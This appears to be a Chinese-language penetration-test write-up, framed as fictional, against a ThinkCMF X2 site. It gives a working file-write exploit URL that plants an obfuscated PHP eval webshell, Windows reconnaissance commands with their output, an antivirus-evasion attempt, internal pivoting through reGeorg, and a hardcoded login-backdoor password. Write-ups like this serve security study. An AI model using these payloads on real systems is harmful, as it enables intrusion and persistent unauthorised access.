记一次拟真环境的模拟渗透测试

注：此文为虚构，如有雷同实属巧合。

本文仅用于记录，Web打点，内网横向一些很常规化的东西。

目标站：http://vuln_attack/

任务：权限、横向

前·信息收集（踩点）

• 端口开放
  • 80 - HTTP
  • 3389 - RDP
• 指纹
  • ThinkCMF
  • PHP/5.6.36
  • IIS
• 目录探测(只探测状态码为301、302、200)
  • http://vuln_attack:80/admin (后台)
    • http://vuln_attack:80/admin/themes/
  • http://vuln_attack:80/api
  • http://vuln_attack:80/aspnet_client (IIS结构)
  • http://vuln_attack:80/data
    • http://vuln_attack:80/data/logs/
    • http://vuln_attack:80/data/upload/
    • http://vuln_attack:80/data/backup/
    • http://vuln_attack:80/data/conf/
      • /index.html
      • /config.php
      • /db.php
  • http://vuln_attack:80/plugins
  • http://vuln_attack:80/public
  • http://vuln_attack:80/test (PHPINFO)
    • /log.txt
    • /0.php
    • /1.php
    • /00.php
    • /01.php
    • /02.php
    • /03.php
    • /04.php
    • /05.php
  • http://vuln_attack:80/themes
  • http://vuln_attack:80/update
  • http://vuln_attack:80/application
  • http://vuln_attack:80/cust
  • http://vuln_attack:80/re (500)
  • http://vuln_attack:80/rp (500)
  • http://vuln_attack:80/www.rar (网站备份源码)
  • http://vuln_attack:80/index.php
  • http://vuln_attack:80/license.txt
• 其他收集 通过下载www.rar文件获得网站备份源码获得的信息
  • 寻找密码
    • grep -i -r "pwd' => '" ./ 结果：
      • sxxxx3
      • rxxxx3
    • grep -i -r "pass' => '" ./ 结果：无
    • grep -i -r "password' => '" ./ 结果：无

中·渗透打入

ThinkCMFx2 0day Get Webshell

• 已知该系统业务为ThinkCMF，且通过泄露的源码文件中得知版本为x2.0.0

  define("SIMPLEWIND_CMF_VERSION", 'X2.0.0');

  使用ThinkCMF的GetWebshell的Exp打一波（结果：未成功）

  访问r.php是404的：

  但在本地搭建测试的时候是可以写入的（Exploit:/index.php?xxx=file_put_contents('r.php','<?php%20eval($_REQUEST[r]);')）：

  思考： a.是否可以写入但被删除 b.exp是否被拦截

  • 修改exp为/index.php?xxx=file_put_contents('1.txt','123')：写入1.txt内容为123

    结果： 上传成功访问存在，可利用exp写文件

  • 修改exp为/index.php?xxx=file_put_contents('1.php','123')：写入1.php内容为123

    结果： 上传成功访问存在，可利用exp写PHP文件

  • 修改exp为/index.php?xxx=file_put_contents('1.php','<?php+$a="assert";$a(base64_decode(@$_REQUEST[k]));?>')

    简单的写了一个绕过的PHP一句话脚本木马：

    <?php $a="assert";$a(base64_decode(@$_REQUEST[k]));?>

    结果： 上传成功访问存在，Webshell拿下

接下来我们进入后深入阶段。

后·深入

主机信息收集

• net user /domain
• 查看域内的用户（此处用来判断是否有域环境）
• 结果：此处非域环境

这项请求将在域 WORKGROUP 的域控制器处理。  发生系统错误 1355。  指定的域不存在，或无法联系。 

• whoami /all
• 查看当前用户

用户信息 ----------------  用户名            SID      ================= ======== nt authority/iusr S-1-5-17   组信息 -----------------  组名                                 类型   SID          属性                           ==================================== ====== ============ ============================== Mandatory Label/High Mandatory Level 标签   S-1-16-12288                                Everyone                             已知组 S-1-1-0      必需的组, 启用于默认, 启用的组 BUILTIN/Users                        别名   S-1-5-32-545 必需的组, 启用于默认, 启用的组 NT AUTHORITY/SERVICE                 已知组 S-1-5-6      只用于拒绝的组                 控制台登录                           已知组 S-1-2-1      必需的组, 启用于默认, 启用的组 NT AUTHORITY/Authenticated Users     已知组 S-1-5-11     必需的组, 启用于默认, 启用的组 NT AUTHORITY/This Organization       已知组 S-1-5-15     必需的组, 启用于默认, 启用的组 LOCAL                                已知组 S-1-2-0      必需的组, 启用于默认, 启用的组   特权信息 ----------------------  特权名                  描述                 状态   ======================= ==================== ====== SeChangeNotifyPrivilege 绕过遍历检查         已启用 SeImpersonatePrivilege  身份验证后模拟客户端 已启用 SeCreateGlobalPrivilege 创建全局对象         已启用 

• net user
• 查看用户

// 的用户帐户  ------------------------------------------------------------------------------- Administrator            Guest                    MYSQL_SF_xxxx           命令运行完毕，但发生一个或多个错误。 

• net localgroup administrators
• 查看本地管理员用户

别名     administrators 注释     管理员对计算机/域有不受限制的完全访问权  成员  ------------------------------------------------------------------------------- Administrator 命令成功完成。 

• ipconfig /all
• 查看本机IP、DNS信息、DHCP服务器信息等
• 结果：此处查看发现并不是内网IP段

Windows IP 配置     主机名  . . . . . . . . . . . . . : WIN-xxx    主 DNS 后缀 . . . . . . . . . . . :     节点类型  . . . . . . . . . . . . : 混合    IP 路由已启用 . . . . . . . . . . : 否    WINS 代理已启用 . . . . . . . . . : 否  以太网适配器 xxxx.133:     连接特定的 DNS 后缀 . . . . . . . :     描述. . . . . . . . . . . . . . . : Microsoft Hyper-V 网络适配器    物理地址. . . . . . . . . . . . . : xx-xx-xx-xx-xx-xx    DHCP 已启用 . . . . . . . . . . . : 否    自动配置已启用. . . . . . . . . . : 是    本地链接 IPv6 地址. . . . . . . . : xxx%11(首选)     IPv4 地址 . . . . . . . . . . . . : xxxx.133(首选)     子网掩码  . . . . . . . . . . . . : 255.255.255.192    默认网关. . . . . . . . . . . . . : xxxx.190    DHCPv6 IAID . . . . . . . . . . . : 234886493    DHCPv6 客户端 DUID  . . . . . . . : xxxx    DNS 服务器  . . . . . . . . . . . : xxxx.151.161                                        xxxx.156.66    TCPIP 上的 NetBIOS  . . . . . . . : 已启用 ... 

• arp -a
• 查看arp的缓冲记录（获取存活的IP地址）

ARP缓存是个用来储存IP地址和MAC地址的缓冲区，其本质就是一个IP地址–>MAC地址的对应表，表中每一个条目分别记录了网络上其他主机的IP地址和对应的MAC地址。每一个以太网或令牌环网络适配器都有自己单独的表。

接口: xxxx.133 --- 0xb   Internet 地址         物理地址              类型   xxxx.129          xx-xx-xx-xx-xx-xx     动态           xxxx.135          xx-xx-xx-xx-xx-xx     动态           xxxx.149          xx-xx-xx-xx-xx-xx     动态           xxxx.150          xx-xx-xx-xx-xx-xx     动态           xxxx.168          xx-xx-xx-xx-xx-xx     动态           xxxx.190          xx-xx-xx-xx-xx-xx     动态           xxxx.191          xx-xx-xx-xx-xx-xx     静态   ...              

• tasklist
• 查看系统任务进程
• 结果：发现存在SafeDog安全防护软件

tasklist  映像名称                       PID 会话名              会话#       内存使用  ========================= ======== ================ =========== ============ System Idle Process              0                            0         24 K System                           4                            0      5,184 K smss.exe                       288                            0      1,156 K mysqld.exe                    1396                            0    839,672 K SafeDogGuardHelper.exe        6476                            2     18,220 K SafeDogGuardHelper.exe        9536                            2     11,748 K ... 

主机提权

• systeminfo
• 查看系统信息

主机名:           WIN-xxxx OS 名称:          Microsoft Windows Server 2008 R2 Datacenter  OS 版本:          6.1.7601 Service Pack 1 Build 7601 OS 制造商:        Microsoft Corporation OS 配置:          独立服务器 OS 构件类型:      Multiprocessor Free 注册的所有人:     Windows 用户 注册的组织:        产品 ID:          xxxx 初始安装日期:     2018/5/9, 22:50:59 系统启动时间:     2018/8/31, 9:38:26 系统制造商:       Microsoft Corporation 系统型号:         Virtual Machine 系统类型:         x64-based PC 处理器:           安装了 1 个处理器。                   [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2500 Mhz BIOS 版本:        American Megatrends Inc. 090006 , 2012/5/23 Windows 目录:     C:/Windows 系统目录:         C:/Windows/system32 启动设备:         /Device/HarddiskVolume1 系统区域设置:     zh-cn;中文(中国) 输入法区域设置:   zh-cn;中文(中国) 时区:             (UTC+08:00) 北京，重庆，香港特别行政区，乌鲁木齐 物理内存总量:     8,192 MB 可用的物理内存:   4,779 MB 虚拟内存: 最大值: 16,381 MB 虚拟内存: 可用:   12,977 MB 虚拟内存: 使用中: 3,404 MB 页面文件位置:     C:/pagefile.sys 域:               WORKGROUP 登录服务器:       暂缺 修补程序:         暂缺 网卡:             安装了 1 个 NIC。                   [01]: Microsoft Hyper-V 网络适配器                       连接名:      xxxx.133                       启用 DHCP:   否                       IP 地址                         [01]: xxxx.133                         [02]: xxxxx 

根据获取的系统信息判断可使用的提权Exploit，尝试上传提权Exploit，运行即被杀：

C:/APP/www/>exp.exe 'exp.exe' 不是内部或外部命令，也不是可运行的程序 或批处理文件。 

通过之前的信息收集知道存在”安全狗”防护软件，发现被杀的Exp都存放在C:/SafeDogRecycle/目录下，文件被随机命名：

 C:/SafeDogRecycle 的目录     <DIR>          .     <DIR>          ..     02ebe5a9-1abf-4f85-839c-2b74deebb02f     ... 

后经测试发现将Exploit存在C:/SafeDogRecycle/目录部分行为并不会被杀，但敏感行为还是会被Kill掉。

本地搭建服务器安全狗，利用修改特征码的方式进行免杀，但即使Bypass了安全狗，Exploit也无法执行，补丁已经打上了。

利用收集到的口令进行字典的整合，猜测管理员密码也无解～

结果: 提权失败

横向

地址：

xxxx.129 xxxx.135 xxxx.149 xxxx.150 xxxx.168 xxxx.190 xxxx.191 

端口扫描仅仅发现xxxx.129、 xxxx.135存在着服务

访问该站点发现其为IIS8.5

经探测并无什么有价值性的东西。

访问该站点发现到了其他的一个站点，这个站点也为ThinkCMFX2，使用上文所述方法拿下WebShell。

环境: Linux

内核: Linux izbp15gn5pyr1s5tlc45h0z 3.10.0-693.2.2.el7.x86_64

权限: www

网络环境: 内网

经过测试发现本机用户权限真的很低，gcc之类的操作都没权限进行，尝试使用suid提权也无果，就连反弹个shell都提示bash: /bin/sh: Permission denied，醉了～

放弃提权，reGeorg+Proxifier 代理进内网撸一波～

结果：发现一个内网主机存活，ThinkCMFX2又撸下来了

终·其他缺陷

对发现的其他安全缺陷做记录是一件很有必要的事情，为防止单个漏洞被修复，也为了下次更好的“进来”。

前台登录万能密码后门

文件/application/Cust/Controller/LoginController.class.php第214行：

在做登录验证的时候有一个条件：$password=='xxxx@123'，前台登录只需要满足密码等于xxxx@123即可实现任意用户的登录。

总结

文章比较常规，总结一句话就是：渗透的前期信息打点很重要，信息的收集要做到细致，就像你看某小电影一样每个高潮的细节都不会放过～